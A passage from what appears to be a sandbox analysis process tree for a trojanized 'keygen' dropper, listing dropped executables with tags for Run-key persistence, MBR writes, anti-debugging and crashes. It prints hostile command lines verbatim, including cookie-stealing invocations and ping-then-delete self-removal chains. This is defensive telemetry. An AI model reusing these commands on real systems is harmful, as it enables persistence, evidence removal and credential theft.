6⤵
- Runs ping.exe
PID:1420

C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
4⤵
- Executes dropped EXE
PID:4496

C:\Users\Admin\AppData\Local\Temp\RarSFX2\installer.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\installer.exe"
5⤵
- Executes dropped EXE
PID:4612

C:\ProgramData\5074078.55
"C:\ProgramData\5074078.55"
6⤵
- Executes dropped EXE
PID:1636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 724
7⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:4768

C:\ProgramData\2817902.30
"C:\ProgramData\2817902.30"
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3680

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
7⤵
- Executes dropped EXE
PID:4068

C:\ProgramData\3445854.37
"C:\ProgramData\3445854.37"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4332

C:\Users\Admin\AppData\Local\Temp\RarSFX1\gdrrr.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gdrrr.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4672

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:4552

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:1736

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4120

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 430DE61C9B5218932B173B697DB1350F C
2⤵
- Loads dropped DLL
PID:4600

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A62064E2F6464893B8AE2E4AF4172933 C
2⤵
- Loads dropped DLL
PID:5008

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
PID:196

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F03DE09F0016AE7F50C652AA3A376ECD C
2⤵
PID:5268

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 955B7C988339B0F130CFF78A063AC440 C
2⤵
PID:6060

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 38987AE37239BB2DCFB2EE7B4E397B89 C
2⤵
PID:6912

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding FCFE22162F01778225AECF5262178DF8 C
2⤵
PID:5152

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E0E820D0491BF02039A2C32C31076016 C
2⤵
PID:7488

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D09EF44EB48407C0380902518CCC4DCB C
2⤵
PID:2152

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 281BC88A42BBD1476C89D946E7D380D6 C
2⤵
PID:1288

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F41C02364BA54DE1C1D3E0F43FCA24AF C
2⤵
PID:5136

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4316

C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe
"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"
1⤵
PID:3956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "
2⤵
PID:4116

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:5080

C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe"
4⤵
- Executes dropped EXE
PID:4980

C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:4760

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:2884

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:4916

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe"
4⤵
PID:2512

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4772

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-2.exe
keygen-step-2.exe
3⤵
- Executes dropped EXE
PID:2848

C:\Users\Admin\AppData\Roaming\4695.tmp.exe
"C:\Users\Admin\AppData\Roaming\4695.tmp.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4248

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\4695.tmp.exe"
5⤵
PID:5660

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:5808

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-2.exe"
4⤵
PID:2636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-2.exe" >> NUL
4⤵
PID:4372

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:4336

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:3340

C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2240

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:3676

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"
5⤵
PID:3320

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:4944

C:\Users\Admin\AppData\Local\Temp\RarSFX5\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2716
5⤵
- Program crash
PID:4192

C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"
4⤵
- Executes dropped EXE
PID:5768

C:\Users\Admin\AppData\Roaming\7A86.tmp.exe
"C:\Users\Admin\AppData\Roaming\7A86.tmp.exe"
5⤵
PID:5180

C:\Users\Admin\AppData\Roaming\7A86.tmp.exe
"C:\Users\Admin\AppData\Roaming\7A86.tmp.exe"
6⤵
PID:6120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"
5⤵
PID:5804

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:5172

C:\Users\Admin\AppData\Local\Temp\RarSFX5\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\BTRSetp.exe"
4⤵
PID:5140

C:\Users\Admin\AppData\Local\Temp\RarSFX11\installer.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX11\installer.exe"
5⤵
PID:4408

C:\ProgramData\999166.10
"C:\ProgramData\999166.10"
6⤵
PID:1228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 724
7⤵
- Program crash
PID:6216

C:\ProgramData\6953580.76
"C:\ProgramData\6953580.76"
6⤵
PID:4884

C:\ProgramData\2568692.28
"C:\ProgramData\2568692.28"
6⤵
PID:6268

C:\Users\Admin\AppData\Local\Temp\RarSFX5\gdrrr.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\gdrrr.exe"
4⤵
PID:6812

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:4488

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:6916

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:4340

C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe
"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"
1⤵
PID:228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen.bat" "
2⤵
PID:7432

C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
PID:8444

C:\Users\Admin\AppData\Local\Temp\RarSFX32\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX32\key.exe"
4⤵
PID:5352

C:\Users\Admin\AppData\Local\Temp\RarSFX32\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX32\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:4588

C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-1.exe
keygen-step-1.exe
3⤵
PID:8484

C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-3.exe
keygen-step-3.exe
3⤵
PID:8536

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-3.exe"
4⤵
PID:5748

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4424

C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-2.exe
keygen-step-2.exe
3⤵
PID:8528

C:\Users\Admin\AppData\Roaming\F5F.tmp.exe
"C:\Users\Admin\AppData\Roaming\F5F.tmp.exe"
4⤵
PID:7644

C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-2.exe"
4⤵
PID:5132

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-2.exe" >> NUL
4⤵
PID:7952

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:6880

C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-4.exe
keygen-step-4.exe
3⤵
PID:8204

C:\Users\Admin\AppData\Local\Temp\RarSFX33\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX33\Setup.exe"
4⤵
PID:8024

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
PID:7148

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX33\Setup.exe"
5⤵
PID:6116

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:7312

C:\Users\Admin\AppData\Local\Temp\RarSFX33\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX33\md2_2efs.exe"
4⤵
PID:7960

C:\Users\Admin\AppData\Local\Temp\RarSFX33\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX33\file.exe"
4⤵
PID:964

C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe
"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"
1⤵
PID:204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen.bat" "
2⤵
PID:4220

C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
PID:5644

C:\Users\Admin\AppData\Local\Temp\RarSFX14\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX14\key.exe"
4⤵
PID:5728

C:\Users\Admin\AppData\Local\Temp\RarSFX14\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX14\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:6280

C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-1.exe
keygen-step-1.exe
3⤵
PID:5036

C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-2.exe
keygen-step-2.exe
3⤵
PID:832

C:\Users\Admin\AppData\Roaming\BAAC.tmp.exe
"C:\Users\Admin\AppData\Roaming\BAAC.tmp.exe"
4⤵
PID:7032

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\BAAC.tmp.exe"
5⤵
PID:7408

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:7500

C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-2.exe"
4⤵
PID:5996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-2.exe" >> NUL
4⤵
PID:5260

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:6296

C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-3.exe
keygen-step-3.exe
3⤵
PID:5840

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-3.exe"
4⤵
PID:6432

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:6772

C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-4.exe
keygen-step-4.exe
3⤵
PID:5828

C:\Users\Admin\AppData\Local\Temp\RarSFX15\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX15\Setup.exe"
4⤵
PID:5128

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
PID:6988

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX15\Setup.exe"
5⤵
PID:6932

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:7044

C:\Users\Admin\AppData\Local\Temp\RarSFX15\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX15\md2_2efs.exe"
4⤵
PID:7056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 2696
5⤵
- Program crash
PID:5564

C:\Users\Admin\AppData\Local\Temp\RarSFX15\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX15\file.exe"
4⤵
PID:6272

C:\Users\Admin\AppData\Roaming\27CE.tmp.exe
"C:\Users\Admin\AppData\Roaming\27CE.tmp.exe"
5⤵
PID:7880

C:\Users\Admin\AppData\Roaming\27CE.tmp.exe
"C:\Users\Admin\AppData\Roaming\27CE.tmp.exe"
6⤵
PID:5632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX15\file.exe"
5⤵
PID:7228

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:6684

C:\Users\Admin\AppData\Local\Temp\RarSFX15\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX15\BTRSetp.exe"
4⤵
PID:6964

C:\Users\Admin\AppData\Local\Temp\RarSFX26\installer.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX26\installer.exe"
5⤵
PID:6292

C:\ProgramData\6137021.67
"C:\ProgramData\6137021.67"
6⤵
PID:6524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6524 -s 724
7⤵
- Program crash
PID:7776

C:\ProgramData\6323886.69
"C:\ProgramData\6323886.69"
6⤵
PID:7720

C:\ProgramData\5950860.65
"C:\ProgramData\5950860.65"
6⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\RarSFX15\gdrrr.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX15\gdrrr.exe"
4⤵
PID:8140

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:4508

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:8260

C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe
"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"
1⤵
PID:3380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen.bat" "
2⤵
PID:5740

C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
PID:4912

C:\Users\Admin\AppData\Local\Temp\RarSFX19\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX19\key.exe"
4⤵
PID:4616

C:\Users\Admin\AppData\Local\Temp\RarSFX19\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX19\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:5148

C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-1.exe
keygen-step-1.exe
3⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-2.exe
keygen-step-2.exe
3⤵
PID:5960

C:\Users\Admin\AppData\Roaming\FA16.tmp.exe
"C:\Users\Admin\AppData\Roaming\FA16.tmp.exe"
4⤵
PID:6832

C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-2.exe"
4⤵
PID:5608

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-2.exe" >> NUL
4⤵
PID:7132

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:7208

C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-3.exe
keygen-step-3.exe
3⤵
PID:5492

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-3.exe"
4⤵
PID:5196

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:5852

C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-4.exe
keygen-step-4.exe
3⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\RarSFX20\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX20\Setup.exe"
4⤵
PID:5972

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
PID:6736

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX20\Setup.exe"
5⤵
PID:7636

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:7760

C:\Users\Admin\AppData\Local\Temp\RarSFX20\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX20\md2_2efs.exe"
4⤵
PID:7680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 3368
5⤵
- Program crash
PID:4592

C:\Users\Admin\AppData\Local\Temp\RarSFX20\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX20\file.exe"
4⤵
PID:9052

C:\Users\Admin\AppData\Roaming\3E3F.tmp.exe
"C:\Users\Admin\AppData\Roaming\3E3F.tmp.exe"
5⤵
PID:2160

C:\Users\Admin\AppData\Roaming\3E3F.tmp.exe
"C:\Users\Admin\AppData\Roaming\3E3F.tmp.exe"
6⤵
PID:1972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX20\file.exe"
5⤵
PID:6188

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:4860

C:\Users\Admin\AppData\Local\Temp\RarSFX20\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX20\BTRSetp.exe"
4⤵
PID:2780

C:\Users\Admin\AppData\Local\Temp\RarSFX35\installer.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX35\installer.exe"
5⤵
PID:4528

C:\ProgramData\3879103.42
"C:\ProgramData\3879103.42"
6⤵
PID:7068

C:\ProgramData\3094693.34
"C:\ProgramData\3094693.34"
6⤵
PID:7908

C:\ProgramData\1279603.14
"C:\ProgramData\1279603.14"
6⤵
PID:4704

C:\Users\Admin\AppData\Local\Temp\RarSFX20\gdrrr.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX20\gdrrr.exe"
4⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:7648

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:7688

C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe
"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"
1⤵
PID:5044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen.bat" "
2⤵
PID:5116

C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\RarSFX16\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX16\key.exe"
4⤵
PID:5964

C:\Users\Admin\AppData\Local\Temp\RarSFX16\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX16\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:6400

C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-1.exe
keygen-step-1.exe
3⤵
PID:2756

C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-2.exe
keygen-step-2.exe
3⤵
PID:5232

C:\Users\Admin\AppData\Roaming\CE34.tmp.exe
"C:\Users\Admin\AppData\Roaming\CE34.tmp.exe"
4⤵
PID:6884

C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-2.exe"
4⤵
PID:7152

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-2.exe" >> NUL
4⤵
PID:3096

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:4968

C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-3.exe
keygen-step-3.exe
3⤵
PID:6372

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-3.exe"
4⤵
PID:5624

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4796

C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-4.exe
keygen-step-4.exe
3⤵
PID:6560

C:\Users\Admin\AppData\Local\Temp\RarSFX17\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX17\Setup.exe"
4⤵
PID:4820

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
PID:6392

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX17\Setup.exe"
5⤵
PID:5524

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:1524

C:\Users\Admin\AppData\Local\Temp\RarSFX17\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX17\md2_2efs.exe"
4⤵
PID:5568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5568 -s 2772
5⤵
- Program crash
PID:7480

C:\Users\Admin\AppData\Local\Temp\RarSFX17\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX17\file.exe"
4⤵
PID:6140

C:\Users\Admin\AppData\Roaming\789D.tmp.exe
"C:\Users\Admin\AppData\Roaming\789D.tmp.exe"
5⤵
PID:8132

C:\Users\Admin\AppData\Roaming\789D.tmp.exe
"C:\Users\Admin\AppData\Roaming\789D.tmp.exe"
6⤵
PID:6548

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX17\file.exe"
5⤵
PID:3628

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:6728

C:\Users\Admin\AppData\Local\Temp\RarSFX17\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX17\BTRSetp.exe"
4⤵
PID:7404

C:\Users\Admin\AppData\Local\Temp\RarSFX31\installer.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX31\installer.exe"
5⤵
PID:8884

C:\ProgramData\3933288.43
"C:\ProgramData\3933288.43"
6⤵
PID:7860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 724
7⤵
- Program crash
PID:5516

C:\ProgramData\7631526.83
"C:\ProgramData\7631526.83"
6⤵
PID:6052

C:\ProgramData\3747127.41
"C:\ProgramData\3747127.41"
6⤵
PID:8344

C:\Users\Admin\AppData\Local\Temp\RarSFX17\gdrrr.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX17\gdrrr.exe"
4⤵
PID:3052

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
